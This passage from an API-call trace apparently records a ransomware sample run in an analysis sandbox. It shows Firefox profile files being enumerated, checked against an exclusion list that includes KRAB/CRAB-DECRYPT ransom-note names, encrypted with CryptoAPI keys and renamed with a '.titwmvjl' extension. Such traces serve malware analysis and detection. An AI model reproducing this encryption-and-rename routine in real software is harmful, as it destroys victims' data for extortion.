lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*" [0084.735] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*", fInfoLevelId=0x1, lpFindFileData=0x259e084, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e084) returned 0x503738 [0084.735] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.735] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.737] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.737] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.737] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.737] lstrcmpW (lpString1=".metadata", lpString2=".") returned 1 [0084.737] lstrcmpW (lpString1=".metadata", lpString2="..") returned 1 [0084.737] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2=".metadata" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata" [0084.737] lstrlenW (lpString=".titwmvjl") returned 9 [0084.737] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata") returned 127 [0084.737] VirtualAlloc (lpAddress=0x0, dwSize=0x13e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.737] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata.titwmvjl") returned 136 [0084.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata") returned 127 [0084.738] lstrlenW (lpString=".metadata") returned 9 [0084.738] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.738] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".metadata ") returned 10 [0084.738] lstrcmpiW (lpString1=".metadata", lpString2=".titwmvjl") returned -1 [0084.738] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata") returned 127 [0084.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata") returned 127 [0084.738] lstrcmpiW (lpString1=".metadata", lpString2="desktop.ini") returned -1 [0084.738] lstrcmpiW (lpString1=".metadata", lpString2="autorun.inf") returned -1 [0084.738] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat") returned -1 [0084.738] lstrcmpiW (lpString1=".metadata", lpString2="iconcache.db") returned -1 [0084.738] lstrcmpiW (lpString1=".metadata", lpString2="bootsect.bak") returned -1 [0084.738] lstrcmpiW (lpString1=".metadata", lpString2="boot.ini") returned -1 [0084.738] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat.log") returned -1 [0084.738] lstrcmpiW (lpString1=".metadata", lpString2="thumbs.db") returned -1 [0084.739] lstrcmpiW (lpString1=".metadata", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.739] lstrcmpiW (lpString1=".metadata", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.739] lstrcmpiW (lpString1=".metadata", lpString2="KRAB-DECRYPT.html") returned -1 [0084.739] lstrcmpiW (lpString1=".metadata", lpString2="CRAB-DECRYPT.html") returned -1 [0084.739] lstrcmpiW (lpString1=".metadata", lpString2="KRAB-DECRYPT.txt") returned -1 [0084.739] lstrcmpiW (lpString1=".metadata", lpString2="CRAB-DECRYPT.txt") returned -1 [0084.739] lstrcmpiW (lpString1=".metadata", lpString2="ntldr") returned -1 [0084.739] lstrcmpiW (lpString1=".metadata", lpString2="NTDETECT.COM") returned -1 [0084.739] lstrcmpiW (lpString1=".metadata", lpString2="Bootfont.bin") returned -1 [0084.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata") returned 127 [0084.739] lstrlenW (lpString=".metadata") returned 9 [0084.739] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.739] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".metadata ") returned 10 [0084.739] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.739] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.740] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2e0 [0084.740] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0084.740] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.740] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4c9980) returned 1 [0084.742] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0084.742] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.742] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.742] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0084.742] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.742] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.742] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.742] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.742] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4c9980) returned 1 [0084.744] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0084.744] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.744] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.744] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0084.744] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.744] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.744] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.745] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4c9980) returned 1 [0084.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.746] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503938) returned 1 [0084.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.747] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0084.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.747] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259df24*=0x100) returned 1 [0084.747] GetLastError () returned 0x0 [0084.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.747] CryptDestroyKey (hKey=0x503938) returned 1 [0084.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.747] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.748] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4c9980) returned 1 [0084.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.749] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0084.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.749] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0084.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.750] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259df24*=0x100) returned 1 [0084.750] GetLastError () returned 0x0 [0084.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.750] CryptDestroyKey (hKey=0x5037b8) returned 1 [0084.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.750] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.750] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.750] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0084.751] ReadFile (in: hFile=0x2e0, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x2e, lpOverlapped=0x0) returned 1 [0084.763] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xffffffd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.763] WriteFile (in: hFile=0x2e0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x2e, lpOverlapped=0x0) returned 1 [0084.764] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.765] WriteFile (in: hFile=0x2e0, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0084.766] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.771] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.771] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.772] CloseHandle (hObject=0x2e0) returned 1 [0084.772] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata.titwmvjl"), dwFlags=0x1) returned 1 [0084.773] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.773] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.774] lstrcmpW (lpString1=".metadata-v2", lpString2=".") returned 1 [0084.774] lstrcmpW (lpString1=".metadata-v2", lpString2="..") returned 1 [0084.774] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2=".metadata-v2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2" [0084.774] lstrlenW (lpString=".titwmvjl") returned 9 [0084.774] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2") returned 130 [0084.774] VirtualAlloc (lpAddress=0x0, dwSize=0x144, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.774] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.titwmvjl") returned 139 [0084.774] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2") returned 130 [0084.774] lstrlenW (lpString=".metadata-v2") returned 12 [0084.774] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.774] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".metadata-v2 ") returned 13 [0084.774] lstrcmpiW (lpString1=".metadata-v2", lpString2=".titwmvjl") returned -1 [0084.774] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.775] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2") returned 130 [0084.775] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2") returned 130 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="desktop.ini") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="autorun.inf") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntuser.dat") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="iconcache.db") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="bootsect.bak") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="boot.ini") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntuser.dat.log") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="thumbs.db") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="KRAB-DECRYPT.html") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="CRAB-DECRYPT.html") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="KRAB-DECRYPT.txt") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="CRAB-DECRYPT.txt") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntldr") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="NTDETECT.COM") returned -1 [0084.775] lstrcmpiW (lpString1=".metadata-v2", lpString2="Bootfont.bin") returned -1 [0084.775] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2") returned 130 [0084.775] lstrlenW (lpString=".metadata-v2") returned 12 [0084.775] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.776] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".metadata-v2 ") returned 13 [0084.776] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.776] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.776] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2e0 [0084.777] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0084.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.777] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4c9980) returned 1 [0084.779] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0084.779] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.779] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.779] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0084.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.779] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.779] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.780] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4c9980) returned 1 [0084.781] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0084.781] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.781] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.781] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0084.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.781] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.781] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.782] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4c9980) returned 1 [0084.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.783] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503838) returned 1 [0084.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.784] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0084.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.784] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259df24*=0x100) returned 1 [0084.784] GetLastError () returned 0x0 [0084.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.784] CryptDestroyKey (hKey=0x503838) returned 1 [0084.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.784] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.784] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4c9980) returned 1 [0084.786] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.786] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503978) returned 1 [0084.786] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.786] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0084.786] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.786] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259df24*=0x100) returned 1 [0084.786] GetLastError () returned 0x0 [0084.786] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.786] CryptDestroyKey (hKey=0x503978) returned 1 [0084.786] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.787] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.787] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.787] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0084.787] ReadFile (in: hFile=0x2e0, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x3b, lpOverlapped=0x0) returned 1 [0084.799] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xffffffc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.799] WriteFile (in: hFile=0x2e0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x3b, lpOverlapped=0x0) returned 1 [0084.800] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.801] WriteFile (in: hFile=0x2e0, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0084.803] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.807] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.807] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.807] CloseHandle (hObject=0x2e0) returned 1 [0084.807] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.titwmvjl"), dwFlags=0x1) returned 1 [0084.809] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.809] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.809] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0084.809] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0084.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a09d2ca4deb61a.lock" [0084.809] lstrlenW (lpString=".titwmvjl") returned 9 [0084.809] lstrlenW 